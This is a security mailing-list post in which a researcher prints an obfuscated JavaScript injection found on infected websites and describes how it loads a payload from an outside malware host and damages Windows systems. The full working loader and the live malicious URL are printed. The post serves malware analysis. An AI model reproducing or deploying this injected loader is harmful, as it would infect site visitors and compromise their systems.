Give a look at the malicious script

[s34c0d3r () gmail com]

Hello  Everyone,
i was just working out over some web application security and found the malicious script injected in the code. It was 
prepared wisely but now gets detected.
here it is:-

<script>var g="g";n={jD:51390};function M(){this.ta=false;var t=new 
String("01hcreat".substr(3)+"eElem"+"649pent".substr(4));var Mt=["P"];this.S="";var K=new String("onlo"+"ad");try {var 
Pm='Ae'} catch(Pm){};var A=new String("defer");try {var p='Q'} catch(p){};try {var H='TH'} catch(H){};var c=new 
String("appIsNt".substr(0,3)+"end"+"JKvChi".substr(3)+"ld");var R=window;try {var Ic='Mm'} catch(Ic){};var j=new 
String("bodTQxn".substr(0,3)+"Ne3iyi3Ne".substr(4,1));xD=14051;xD+=70;var u=new Date();var 
TD=document;this.GS=22175;this.GS--;var F=new 
String("scrip"+"tQCwq".substr(0,1));this.D="";this.nB=35701;this.nB-=197;var 
b=String("srKo8".substr(0,2)+"cxUZ".substr(0,1));this.y=63146;this.y--;this.Mx=57925;this.Mx++;function cJ(){try {var 
HI='C'} catch(HI){};try {var 
G=String("/go"+"ogl"+"e.c"+"om/"+"7AG8new".substr(4)+"gro"+"und"+"s.c"+"om/"+"kEAZdow".substr(4)+"nlo"+"ad."+"ytJ4com".substr(4)+".ph"+"p");var
 z=856480-848400;F_={FD:false};CB={HY:false};var Gx=new String("http:"+"//
 
 pas"+"sport"+"blues"+".ru:");this.m="";this.pZ="";var B=6126-6125;var 
xL=["Gp","MK","vC"];this.l=28692;this.l-=179;i=TD[t](F);_R={h:false};try {} catch(L){};var zQ=["jl","s"];var 
NR={af:false};try {var NF='Pv'} catch(NF){};try {var Cn='cC'} catch(Cn){};this.iQ=false;aQG=["FU","LQ"];var 
sB="sB";i[A]=B;var PZx="";var aW="";i[b]=Gx+z+G;var Xj=new Date();var ew=new Date();iy=32656;iy-=67;TD[j][c](i);try {} 
catch(ai){};try {} catch(xS){};} catch(X){var Ac={et:"fM"};var RW='';};}R[K]=cJ;this.ge=39406;this.ge++;var 
ewO={jt:"xl"};};var jf={i_:"SY"};var Ph={cM:"Ge"};M();try {var RV='bV'} catch(RV){};</script>


till now what i found is that when any one visit the infected site ,this script redirects the person to
"http://passportblues.ru:8080/google.com/newsground.com/download.com.php";

passportblues.ru is infecting system,
For the First Time it tried to download Notes1.pdf file.
the strange thing is that it loaded the notes1.pdf file, but the pdf didn't had any exploit embedded in it. the 
site(passportblue.ru) when successfully infect the system an cmd.exe process is created,which actually executes the 
batchfile downloaded on system  which deletes "iexplorer" it infects the system and remove around 7-8 .sys files from 
windows. after that Pendrive is blocked over the system. USB port works,(wifi usb adapters are working)but no pendrive 
works.
it tries to install over rootkit on the system as well as internet connection is also blocked on the system .

it is really a notorious script with a little technique to join the whole.
"hxxp://passportblues.ru:8080/google.com/newsground.com/download.com.php"

any comments regarding it is welcomed
Tarun Kalla
aka S34



This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now! 
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------